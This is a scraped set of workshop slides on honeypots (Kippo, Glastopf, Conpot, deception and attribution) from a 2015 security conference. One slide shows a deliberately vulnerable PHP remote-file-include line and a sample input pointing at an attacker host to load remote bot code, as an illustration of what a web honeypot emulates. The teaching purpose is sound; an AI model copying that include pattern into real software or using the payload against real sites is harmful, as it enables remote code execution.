![Page 68: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/68.jpg)
“OTS” Honeypots
- http://www.honeynet.org/project
![Page 69: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/69.jpg)
First steps with a honeypot
![Page 70: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/70.jpg)
![Page 71: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/71.jpg)
Let’s play with Kippo!
![Page 72: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/72.jpg)
KippoKippo is a low-interaction server honeypot emulating the Secure Shell (SSH) service. It stores information about brute-force login attacks against the service and SSH session & actions the attacker launched against the server.
![Page 73: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/73.jpg)
KippoAccording to ENISA:
“Kippo is extremely useful because, in addition to the detection of simple brute-force attacks against SSH, it also allows you to gather data from terminal session activity of an attacker in the emulated environment and to catch files downloaded by the attacker.”
![Page 74: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/74.jpg)
https://github.com/desaster/kippo
![Page 75: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/75.jpg)
Kippo- Install Kippo- https://github.com/desaster/kippo/
- Connect to kippo as an attacker.- How can you detect you’re not on a real
system?- How can you increase kippo's stealth?
![Page 76: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/76.jpg)
KippoKippo uses predefined credentials & password for “root” user.- Change that cinematic and make kippo accept
a connection after X trials.- What possibly can go wrong?- Howto fix that?
![Page 77: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/77.jpg)
![Page 78: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/78.jpg)
IntroductionWhy you should be hereGoal of this trainingHands-on definitionWhat are we not doing
![Page 79: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/79.jpg)
IntroductionWhy you should be here:
Honeypots complement a security posture
Any kind of non-destructive intel is valuable
Wide range of data quality and type
I build honeypots
![Page 80: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/80.jpg)
IntroductionGoal of this training:
Understand the value of honeypots
Familiarize with the usage of honeypots
Get a glimpse at honeypot development
![Page 81: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/81.jpg)
IntroductionHands-on definition:
You will run a honeypot
Set-up and customization
Look at and create some data
![Page 82: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/82.jpg)
IntroductionWhat are we not doing:
Install and run a honeypot. What?!
Up to you and the time we have...
![Page 83: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/83.jpg)
ConceptsHoneypot EventsAttribution
![Page 84: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/84.jpg)
ConceptsHoneypot Events
Potentially malicious
Lots of noise
Various sources
Take everything with a grain of salt
![Page 85: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/85.jpg)
ConceptsAttribution
It’s a fun game, please play it
The more data the better
What do you get from it?
![Page 86: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/86.jpg)
TechnologyGlastopfLet’s build a honeypotGrades of interactionConpot
![Page 87: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/87.jpg)
TechnologyGlastopf
Web Application Honeypot
Attracting the adversary
Vulnerability Type Emulation
![Page 88: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/88.jpg)
A Honeypot in 20 minutes
![Page 89: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/89.jpg)
https://gist.github.com/glaslos/ac8c32e90ba33e01624e
![Page 90: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/90.jpg)
TechnologyLet’s build a honeypot:
1. Get a domain
2. Handle requests
3. ???= $$$
![Page 91: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/91.jpg)
TechnologyGrades of interaction:
Let’s emulate a vulnerability
include( $_GET['NAME'] . '.php' );
?NAME=http://evil.com/bot
* Abusing Search Engines….
![Page 92: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/92.jpg)
TechnologyGlastopfAttracting the adversary:
How do they find us?
Google Dorks
Crafting the bait
![Page 93: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/93.jpg)
TechnologyConpot
SCADA/ICS Honeypot
Methods of deployment
Get complex
![Page 94: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/94.jpg)
Set-UpThis is a Honeypot!FingerprintingHands-on
![Page 95: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/95.jpg)
CustomizationWhy do you want to?Basic concepts of deceptionWho do you want to catch?
![Page 96: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/96.jpg)
Data AnalysisWhat is an event?Event reportingWhat do we see?What are we not seeing?Can we attribute?
![Page 97: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/97.jpg)
SzenariosLet’s “attack” a honeypotHow to abuse a honeypot
![Page 98: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/98.jpg)
SummaryHoneypotsDevelopmentDeploymentUsage
![Page 99: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/99.jpg)
Sneak Peak: SnareYet Another Web App HoneypotFocus on attack surfaceCentral vulnerability EmulationHoneypot as a Service
![Page 100: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/100.jpg)
Thanks!github.com/mushorg@glaslos - Lukas@y0m - Guillaume